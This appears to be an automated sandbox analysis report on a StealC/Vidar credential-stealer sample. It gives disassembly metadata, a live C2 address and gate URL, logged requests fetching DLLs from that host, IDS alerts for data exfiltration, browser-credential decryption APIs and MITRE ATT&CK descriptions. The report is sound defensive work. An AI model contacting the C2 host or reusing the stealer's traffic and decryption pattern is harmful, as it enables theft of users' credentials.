API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 760d0d4f5073e82127c44d729726fb61a50fbd1d5c5f868965c4cd748341fb96
Instruction ID: d98f96ca440d2142f7f31e02d019bda2ba1fbc21e5967045fa19bf31f1e2a38a
Opcode Fuzzy Hash: 760d0d4f5073e82127c44d729726fb61a50fbd1d5c5f868965c4cd748341fb96
Instruction Fuzzy Hash: 5AF09E3A309640DFFB008B68D866B8177756B53218F040165C56847F61F731B50BCA93

Function 6CCABED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6CCABEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CCABEF5

Strings

cryptbase.dll, xrefs: 6CCABEF0

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: f3ef7f8bee7f82d9fa768b27db28f0325c04139ddce01b1a693e40f95a3a0471
Instruction ID: 476597f20a9902ffe5e198a230186a3c87bdb9af954b291c6b0333eeb7a6c393
Opcode Fuzzy Hash: f3ef7f8bee7f82d9fa768b27db28f0325c04139ddce01b1a693e40f95a3a0471
Instruction Fuzzy Hash: 4CD0C73118410CFBE6406B919D1AB153778A701715F10C021F75554D91D7B1D456CF94

Function 6CCEB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CCEB2C9,?,?,?,6CCEB127,?,?,?,?,?,?,?,?,?,6CCEAE52), ref: 6CCEB628

Part of subcall function 6CCE90E0: free.MOZGLUE(?,00000000,?,?,6CCEDEDB), ref: 6CCE90FF
Part of subcall function 6CCE90E0: free.MOZGLUE(?,00000000,?,?,6CCEDEDB), ref: 6CCE9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CCEB2C9,?,?,?,6CCEB127,?,?,?,?,?,?,?,?,?,6CCEAE52), ref: 6CCEB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CCEB2C9,?,?,?,6CCEB127,?,?,?,?,?,?,?,?,?,6CCEAE52), ref: 6CCEB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CCEB127,?,?,?,?,?,?,?,?), ref: 6CCEB74D

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 5fc20e5c254072250eb6cda5dd096b9d7678da14efc366b459f158b497132f31
Instruction ID: 23d70665d4e98018c35eeb2411a66ae3d709f2edaffed551119d27435c35b83c
Opcode Fuzzy Hash: 5fc20e5c254072250eb6cda5dd096b9d7678da14efc366b459f158b497132f31
Instruction Fuzzy Hash: DC51C2B1A053168FDB14CF19C99076EB7B5FF8A304F45852DC85AABB10E731E904CBA5

Function 6CCE6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CCE6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CCE6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CCE6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCE6F5C

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 47f7fa239278b97a78076bc34278f447220a912037527e0c836cfb3485bf1a88
Instruction ID: eb611553d9ce78377079d16694ecec6b48cae57c3ddbae53e79d4a093472623a
Opcode Fuzzy Hash: 47f7fa239278b97a78076bc34278f447220a912037527e0c836cfb3485bf1a88
Instruction Fuzzy Hash: 1431C771A20A0A8FEB04CF2CC9417AA73E9FB8A344F50453DD51AC7651FB31E659C7A1

Function 6CCFB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CCA0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CCA0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CCA0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CCA0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFB67F

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: c87b46076c34e9ece79f69c0d35e01ae0bddce816c5476dab95dd72009ddcc59
Instruction ID: baac1d6c5fc1bf64683acbe86ab40b01a99e3735565666260304b028d538c54f
Opcode Fuzzy Hash: c87b46076c34e9ece79f69c0d35e01ae0bddce816c5476dab95dd72009ddcc59
Instruction Fuzzy Hash: 2A312771A002168FEB14CF58C85465EBBF6FF80304F168529C826DB701EB31E916CBE0

Function 6CCCF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6CCCF611
memcpy.VCRUNTIME140(?,?,?), ref: 6CCCF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6CCCF652
memcpy.VCRUNTIME140(?,?,?), ref: 6CCCF668

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: f99658b38495d5d0a41b75037526f394819f1d708e1e960997f0478820b32f98
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: F8313E71B00214AFC714CF5ECCC0A9A77B5FBC8354B14853DEA498BB14E671F9448BA1

Function 6CCE26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCE26C1
free.MOZGLUE(?), ref: 6CCE26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCE26FF
free.MOZGLUE ref: 6CCE270D

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4ef7814f92b862d057353cbd3583289d370d8442e2ed3a2e1885dab63136f572
Instruction ID: 3630a8817d228a2485bd39bbd5429261e1b2d0a4d4406c974578f6d99a9082ce
Opcode Fuzzy Hash: 4ef7814f92b862d057353cbd3583289d370d8442e2ed3a2e1885dab63136f572
Instruction Fuzzy Hash: 3EF0F4B27012025BF7009E58DC89B4BB3ADEF4A218B100135EA1AD3B02F331F919C6A2

Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpkP	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpX#	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpnfigOverlay	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll6	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpainnet	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php%_	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpOP	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phprowser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll2	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dllT	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dllept	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dllZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/Ebi)	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php;P	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpdll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dlll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dllH	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpP	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phptrf_	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpirefox	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll~	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllm	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dllz	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll$	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpB_9)	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php24	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/1b	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.3a0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.3a0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003A9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_003A9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003AC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_003AC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_003A7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_003A9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_003B8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CCA6C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.9:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.9:49705
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.9:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.9:49705
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.9:49705 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
